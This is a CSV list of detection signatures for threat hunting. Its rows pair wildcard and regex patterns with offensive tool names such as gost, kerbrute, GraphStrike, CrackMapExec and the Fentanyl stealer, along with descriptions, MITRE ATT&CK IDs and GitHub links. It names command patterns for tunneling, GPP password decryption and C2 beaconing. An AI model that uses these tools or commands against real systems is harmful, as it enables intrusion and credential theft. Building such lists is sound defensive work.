"*goShellCodeByPassVT*",".{0,1000}goShellCodeByPassVT.{0,1000}","offensive_tool_keyword","cobaltstrike","generate shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/fcre1938/goShellCodeByPassVT","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*goshs -b * --ssl --self-signed -p * -d /workspace*",".{0,1000}goshs\s\-b\s.{0,1000}\s\-\-ssl\s\-\-self\-signed\s\-p\s.{0,1000}\s\-d\s\/workspace.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*gost -L=:* -F=*:*",".{0,1000}gost\s\-L\=\:.{0,1000}\s\-F\=.{0,1000}\:.{0,1000}","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","10","15142","2402","2024-04-19T11:42:09Z","2015-03-20T09:45:08Z" "*gost -L=admin:*@localhost:*",".{0,1000}gost\s\-L\=admin\:.{0,1000}\@localhost\:.{0,1000}","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","10","15142","2402","2024-04-19T11:42:09Z","2015-03-20T09:45:08Z" "*gost -L=forward+ssh://:*",".{0,1000}gost\s\-L\=forward\+ssh\:\/\/\:.{0,1000}","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","10","15142","2402","2024-04-19T11:42:09Z","2015-03-20T09:45:08Z" "*gost -L=rtcp://*",".{0,1000}gost\s\-L\=rtcp\:\/\/.{0,1000}","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","10","15142","2402","2024-04-19T11:42:09Z","2015-03-20T09:45:08Z" "*gost -L=rudp://*",".{0,1000}gost\s\-L\=rudp\:\/\/.{0,1000}","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","10","15142","2402","2024-04-19T11:42:09Z","2015-03-20T09:45:08Z" "*gost -L=ssh://:",".{0,1000}gost\s\-L\=ssh\:\/\/\:","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","10","15142","2402","2024-04-19T11:42:09Z","2015-03-20T09:45:08Z" "*gost -L=ssu://*",".{0,1000}gost\s\-L\=ssu\:\/\/.{0,1000}","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","10","15142","2402","2024-04-19T11:42:09Z","2015-03-20T09:45:08Z" "*gost -L=udp://*",".{0,1000}gost\s\-L\=udp\:\/\/.{0,1000}","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","10","15142","2402","2024-04-19T11:42:09Z","2015-03-20T09:45:08Z" "*Got encrypted TGT for * but couldn't convert to hash*",".{0,1000}Got\sencrypted\sTGT\sfor\s.{0,1000}\sbut\scouldn\'t\sconvert\sto\shash.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*Got expected RPC_S_SERVER_UNAVAILABLE exception. Attack worked*",".{0,1000}Got\sexpected\sRPC_S_SERVER_UNAVAILABLE\sexception\.\sAttack\sworked.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*Got lsass.exe PID: *",".{0,1000}Got\slsass\.exe\sPID\:\s.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*gotato -m http*",".{0,1000}gotato\s\-m\shttp.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","113","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "*gotato -m pipe*",".{0,1000}gotato\s\-m\spipe.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","113","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "*gotato* -n mal*",".{0,1000}gotato.{0,1000}\s\-n\smal.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","113","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "*gotato* -p 4644*",".{0,1000}gotato.{0,1000}\s\-p\s4644.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","113","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "*Gotato-main.*",".{0,1000}Gotato\-main\..{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","1","N/A","9","2","113","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "*govolution/avet*",".{0,1000}govolution\/avet.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*goWMIExec -target ",".{0,1000}goWMIExec\s\-target\s","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","N/A","10","3","212","43","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z" "*goWMIExec/pkg*",".{0,1000}goWMIExec\/pkg.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","1","N/A","10","3","212","43","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z" "*goZulipC2.go*",".{0,1000}goZulipC2\.go.{0,1000}","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*goZulipC2-main*",".{0,1000}goZulipC2\-main.{0,1000}","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*gpg2john.*",".{0,1000}gpg2john\..{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*gpoddity.py*",".{0,1000}gpoddity\.py.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","1","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*gpoddity_smbserver.py*",".{0,1000}gpoddity_smbserver\.py.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","1","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*GPOddity-master*",".{0,1000}GPOddity\-master.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","1","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*GPO-RemoteAccess.txt*",".{0,1000}GPO\-RemoteAccess\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*gpp_autologin.py*",".{0,1000}gpp_autologin\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*gpp_password.py*",".{0,1000}gpp_password\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*GPP_Passwords.txt*",".{0,1000}GPP_Passwords\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*gppassword.py*",".{0,1000}gppassword\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*gpp-decrypt *",".{0,1000}gpp\-decrypt\s.{0,1000}","offensive_tool_keyword","gpp-decrypt","Decrypt the given Group Policy Preferences","T1552.002 - T1212","TA0009 - TA0006","N/A","N/A","Credential Access","https://gitlab.com/kalilinux/packages/gpp-decrypt","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*gpp-decrypt.py -f groups.xml*",".{0,1000}gpp\-decrypt\.py\s\-f\sgroups\.xml.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*gpp-decrypt.rb*",".{0,1000}gpp\-decrypt\.rb.{0,1000}","offensive_tool_keyword","gpp-decrypt","Decrypt the given Group Policy Preferences","T1552.002 - T1212","TA0009 - TA0006","N/A","N/A","Credential Access","https://gitlab.com/kalilinux/packages/gpp-decrypt","1","1","N/A","6","10","N/A","N/A","N/A","N/A" "*GPSCoordinates.exe*",".{0,1000}GPSCoordinates\.exe.{0,1000}","offensive_tool_keyword","GPSCoordinates","Tracks the system's GPS coordinates (accurate within 1km currently) if Location Services are enabled","T1018 - T1059.001","TA0001 - TA0002","N/A","N/A","Reconnaissance","https://github.com/matterpreter/OffensiveCSharp/tree/master/GPSCoordinates","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*Gr1mmie/AtlasC2*",".{0,1000}Gr1mmie\/AtlasC2.{0,1000}","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","199","40","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" "*grabMinecraftCache(*",".{0,1000}grabMinecraftCache\(.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*grabPasswords(self,mkp,bname,pname,data)*",".{0,1000}grabPasswords\(self,mkp,bname,pname,data\).{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*grahamhelton/IMDSpoof*",".{0,1000}grahamhelton\/IMDSpoof.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","1","N/A","8","1","84","2","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z" "*GRANT ALL PRIVILEGES ON jasmin_db.*",".{0,1000}GRANT\sALL\sPRIVILEGES\sON\sjasmin_db\..{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*GrantMailboxAccess.ps1*",".{0,1000}GrantMailboxAccess\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*GrantSamAccessPermission.vbs*",".{0,1000}GrantSamAccessPermission\.vbs.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*GrantSamAccessPermission.vbs*",".{0,1000}GrantSamAccessPermission\.vbs.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*GraphLdr.x64.bin*",".{0,1000}GraphLdr\.x64\.bin.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/GraphStrike","1","1","N/A","10","10","504","70","2024-01-29T16:39:40Z","2024-01-02T00:18:44Z" "*GraphLdr.x64.exe*",".{0,1000}GraphLdr\.x64\.exe.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/GraphStrike","1","1","N/A","10","10","504","70","2024-01-29T16:39:40Z","2024-01-02T00:18:44Z" "*GraphRunner*access_tokens.txt*",".{0,1000}GraphRunner.{0,1000}access_tokens\.txt.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*GraphRunner*chatsResponse.json*",".{0,1000}GraphRunner.{0,1000}chatsResponse\.json.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*GraphRunner/PHPRedirector*",".{0,1000}GraphRunner\/PHPRedirector.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*GraphRunner\PHPRedirector*",".{0,1000}GraphRunner\\PHPRedirector.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*GraphRunnerGUI.html*",".{0,1000}GraphRunnerGUI\.html.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*graphspy -i *",".{0,1000}graphspy\s\-i\s.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1190 - T1133 - T1071 - T1082 - T1566.002","TA0001 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/RedByte1337/GraphSpy","1","0","N/A","7","4","346","39","2024-04-17T19:18:08Z","2024-02-07T19:47:15Z" "*GraphSpy.GraphSpy:main*",".{0,1000}GraphSpy\.GraphSpy\:main.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1190 - T1133 - T1071 - T1082 - T1566.002","TA0001 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/RedByte1337/GraphSpy","1","0","N/A","7","4","346","39","2024-04-17T19:18:08Z","2024-02-07T19:47:15Z" "*graphspy.py -i *",".{0,1000}graphspy\.py\s\-i\s.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1190 - T1133 - T1071 - T1082 - T1566.002","TA0001 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/RedByte1337/GraphSpy","1","0","N/A","7","4","346","39","2024-04-17T19:18:08Z","2024-02-07T19:47:15Z" "*GraphStrike Server is running and checking SharePoint for Beacon traffic*",".{0,1000}GraphStrike\sServer\sis\srunning\sand\schecking\sSharePoint\sfor\sBeacon\straffic.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","10","10","504","70","2024-01-29T16:39:40Z","2024-01-02T00:18:44Z" "*GraphStrike.py *",".{0,1000}GraphStrike\.py\s.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","10","10","504","70","2024-01-29T16:39:40Z","2024-01-02T00:18:44Z" "*GreatSCT*",".{0,1000}GreatSCT.{0,1000}","offensive_tool_keyword","GreatSCT","GreatSCT is a tool designed to generate metasploit payloads that bypass common anti-virus solutions and application whitelisting solutions. GreatSCT is current under support by @ConsciousHacker","T1027 - T1055 - T1566 - T1218","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","10","1112","199","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*GreatSCT.git*",".{0,1000}GreatSCT\.git.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1112","199","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*GreatSCT.py*",".{0,1000}GreatSCT\.py.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1112","199","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*Greenwolf*",".{0,1000}Greenwolf.{0,1000}","offensive_tool_keyword","Greenwolf","A Social Media Mapping Tool that correlates profiles via facial recognition by Jacob Wilkin (Greenwolf).Social Mapper is an Open Source Intelligence Tool that uses facial recognition to correlate social media profiles across different sites on a large scale. It takes an automated approach to search popular social media sites for targets' names and pictures to accurately detect and group a persons presence. outputting the results into report that a human operator can quickly review.Social Mapper has a variety of uses in the security industry. for example the automated gathering of large amounts of social media profiles for use on targeted phishing campaigns. Facial recognition aids this process by removing false positives in the search results. so that reviewing this data is quicker for a human operator.","T2348 - T2349 - T2366 - T2423 - T2597 - T2596","TA0011 - TA0022 - TA0026","N/A","N/A","Information Gathering","https://github.com/Greenwolf/social_mapper","1","0","N/A","N/A","10","3685","787","2022-02-25T18:08:41Z","2018-07-07T14:50:07Z" "*gremwell/o365enum*",".{0,1000}gremwell\/o365enum.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","1","N/A","7","3","220","38","2024-04-12T21:42:47Z","2020-02-18T12:22:50Z" "*grep-through-commits.sh *",".{0,1000}grep\-through\-commits\.sh\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*Group3r.cs*",".{0,1000}Group3r\.cs.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","Discovery","https://github.com/Group3r/Group3r","1","1","AD Enumeration","7","6","592","55","2024-03-19T03:08:39Z","2021-07-05T05:05:42Z" 